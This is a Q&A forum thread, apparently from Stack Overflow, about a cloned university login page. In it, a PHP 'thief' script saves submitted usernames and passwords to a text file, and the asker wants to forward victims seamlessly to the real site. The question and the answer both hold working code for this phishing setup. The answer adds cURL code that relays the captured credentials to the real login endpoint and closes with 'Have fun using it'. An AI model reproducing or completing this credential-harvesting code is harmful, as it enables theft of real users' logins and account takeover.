# Need to Redirect and Fill-in Information with PHP

Tags: php, html, forms

I have cloned a login page for a website and hosted it on my personal server in order to do some browser security testing.  I am attempting to take note of login information and still redirect the user to the un-cloned website, logged in.

Here is my HTML form:

```
<form name="login" method="post" action="https://my.website.edu/e/portal/login.asp">
<input type="text" placeholder=" Username" name="username" id="username" alt="Username" style="width:100%;font-size:24px;" /><br/>
<input type="password" placeholder=" Password" name="pin" id="pin" alt="Password" style="width:100%;margin-top:5px;font-size:24px;" /><br/>
<input type="submit" value="Sign In" name="B1" style="width:101%;font-size:18px;height:35px;margin-top:5px;margin-bottom:5px;" />
<p><a href="https://my.website.edu/e/is/user/change_password_form.asp?t=2">Forgot Password?</a></p>
</form>
```

Submitting information and hitting Submit will log users into the "real" un-cloned website.

I wrote a "thief" script that will steal the information and write it into a file:

```
<?php

$txt = "info.txt";
$fh = fopen($txt, 'a+');
if (isset($_POST['username']) && isset($_POST['pin'])) {
   $txt=$_POST['username'].','.$_POST['pin'];
   file_put_contents('info.txt',$txt."\n",FILE_APPEND);
   exit();
}
   fwrite($fh,$txt);
   fclose($fh);
?>
```

I can execute this script by changing the form to action='thief.php', but I cannot then use the login.asp action to actually log in.

Without using javascript, is it possible to take the $_POST values from the form, write them to our info.txt, and then somehow complete the login action?

I feel like the best approach would be to use the php script to redirect back to the login page, fill-in the username/password boxes with the $_POST values, and then somehow execute a submit, transporting the user seamlessly to the destination of the form's original action.

What additional php code would I need to do this?  Is there a better way?

Comment: You don't need f* functions if you use file_put_contents().

Comment: not possible. the form is being submitted via POST. Your server could redirect to the real site, but redirects can only be done via GET.

Comment: Even if you tell us you don't want to steal data we can't be sure...

Comment: Maybe CURL will help you out: [cURL-Manual](http://www.php.net/manual/de/book.curl.php)

Answer (score 0):

Something like this after your script :

```
$url = 'the-url.tld/blabla/login.asp';

$data = '';

// formating the post data with $_POST values
foreach( $_POST as $k => $v ){

    $data .= $k.'='.urlencode($v).'&';
}

$data = rtim($data, '&'); // delete the last & of $data

$ch = curl_init(); // init curl

curl_setopt($ch,CURLOPT_URL, $url); // set url
curl_setopt($ch,CURLOPT_POST, count($_POST)); // set number of $_POST fileds
curl_setopt($ch,CURLOPT_POSTFIELDS, $data); // set $_POST data

$res = curl_exec($ch); // execute the curl query and get result in $res

curl_close($ch); // close curl

var_dump($res); // show the result of query
```

And your script could be simpler :

```
$txt = "info.txt";

if( isset($_POST['username'], $_POST['pin']) ){

    $acc_infos = $_POST['username'].','.$_POST['pin']."\r\n";

    file_put_contents($txt, $acc_infos, FILE_APPEND);
}
```

Have fun using it